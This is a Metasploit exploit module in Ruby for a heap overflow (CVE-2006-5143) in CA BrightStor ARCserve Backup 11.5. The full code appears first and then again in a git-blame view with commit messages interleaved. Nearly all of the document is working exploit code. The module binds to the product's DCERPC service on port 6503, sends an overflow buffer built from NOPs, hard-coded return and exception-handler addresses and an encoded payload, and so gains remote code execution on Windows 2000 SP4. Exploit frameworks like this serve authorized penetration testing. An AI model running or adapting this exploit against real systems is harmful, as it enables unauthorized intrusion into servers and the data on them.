metasploit-framework/modules/exploits/windows/brightstor/message_engine_heap.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor ARCserve Message Engine Heap Overflow',
			'Description'    => %q{
					This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup
				11.5. By sending a specially crafted RPC request, an attacker could overflow the
				buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-5143' ],
					[ 'OSVDB', '29533' ],
					[ 'BID', '20365' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'  =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],
				],
			'DisclosureDate' => 'Oct 05 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6503)
			], self.class)
	end

	def exploit
		connect

		handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")

		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# straight forward heap stuffz
		sploit =  make_nops(680) + "\xeb\x0a" + make_nops(2) + [ target.ret ].pack('V')
		sploit << [ target['UEF'] ].pack('V') + payload.encoded

		print_status("Trying target #{target.name}...")

			begin
				dcerpc_call(43, sploit)
				rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			end

		handler
		disconnect
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::DCERPC`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00
			`def initialize(info = {})`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`11.5. By sending a specially crafted RPC request, an attacker could overflow the`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`buffer and execute arbitrary code.`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`'References' =>`
			`[`
			`[ 'CVE', '2006-5143' ],`
More references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6551 4d416f70-5f16-0410-b530-b9f4589650da 2009-05-14 19:56:07 +00:00			`[ 'OSVDB', '29533' ],`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`[ 'BID', '20365' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 800,`
			`'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`[`
			`['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],`
			`],`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`'DisclosureDate' => 'Oct 05 2006',`
			`'DefaultTarget' => 0))`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(6503)`
			`], self.class)`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`end`

			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
			`handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`print_status("Binding to #{handle} ...")`

			`dcerpc_bind(handle)`
			`print_status("Bound to #{handle} ...")`

			`# straight forward heap stuffz`
			`sploit = make_nops(680) + "\xeb\x0a" + make_nops(2) + [ target.ret ].pack('V')`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`sploit << [ target['UEF'] ].pack('V') + payload.encoded`
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00
			`print_status("Trying target #{target.name}...")`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
renamed... git-svn-id: file:///home/svn/framework3/trunk@4388 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-15 19:08:55 +00:00			`begin`
			`dcerpc_call(43, sploit)`
			`rescue Rex::Proto::DCERPC::Exceptions::NoResponse`
			`end`

			`handler`
			`disconnect`
			`end`

More references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6551 4d416f70-5f16-0410-b530-b9f4589650da 2009-05-14 19:56:07 +00:00			`end`